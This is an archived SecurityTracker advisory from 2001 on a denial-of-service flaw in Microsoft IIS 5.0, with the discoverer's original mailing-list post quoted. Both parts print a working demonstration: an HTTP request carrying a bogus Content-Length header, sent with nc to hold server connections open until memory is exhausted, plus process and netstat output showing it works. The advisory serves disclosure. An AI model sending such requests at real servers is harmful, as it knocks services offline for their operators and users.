SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Microsoft Internet Information Server (IIS) Web Server Vendors:   Microsoft
Microsoft Internet Information Server Can Be Crashed By Remote Users With HTTP Requests Containing Invalid Content-Length Values
SecurityTracker Alert ID:  1002957
SecurityTracker URL:  http://securitytracker.com/id/1002957
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 12 2001
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 5.0
Description:   A vulnerability was reported in Microsoft's Internet Information Server. A remote user can cause the server to consume all available memory by sending special HTTP request.

A remote user can send an HTTP request that contains an invalid "Content-Length:" field to the server to cause the server to wait with the connection open.

A demonstration exploit transcript is provided:

$ cat " GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic" >bogus.txt

$ nc 192.168.0.10 80 <bogus.txt &

If a remote user issues enough requests, the server can be made to consume all available memory.

Impact:   A remote user can issue an HTTP request that will cause the server to leave the connection open and wait. If the remote user sends enough of these requests, the server can be made to consume all available memory.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:   Exception handling error, Resource error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  Microsoft IIS/5 bogus Content-length bug.


Let's say that it's a bug, not a security flaw, but probably can lead
into denial of service with some tweaking.
When you send a bad request to Microsoft IIS/5.0 server it gives you the
error and closes the connection, like when you fail to authenticate.
Well... let's take a look to a normal request:
GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Authorization: Basic

And then let's add a "Content-Length: 5300643" field.

When you send the new request to the server ir hangs there waiting
something to happen and never closes the connection.

Let's try this:
$ cat " GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic" >bogus.txt

$ nc 192.168.0.10 80 <bogus.txt &
$ ps x
      PID    PPID    PGID     WINPID  TTY  UID    STIME COMMAND
      696       1     696        696  con  500 12:22:37 /usr/bin/bash
     2464     696    2464       2464  con  500 12:23:56 /usr/bin/nc
     2532     696    2532       1552  con  500 12:29:16 /usr/bin/ps

$ netstat -an |grep 192.168.0.10
  TCP    192.168.0.4:2479       192.168.0.10:80        ESTABLISHED

Now you have a waiting open connection. You can open as much as you
want. The server never stops the connections and I have seen no timeout.

Well, I left this here.

Thanks for the time of reading

Ivan Hernandez

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC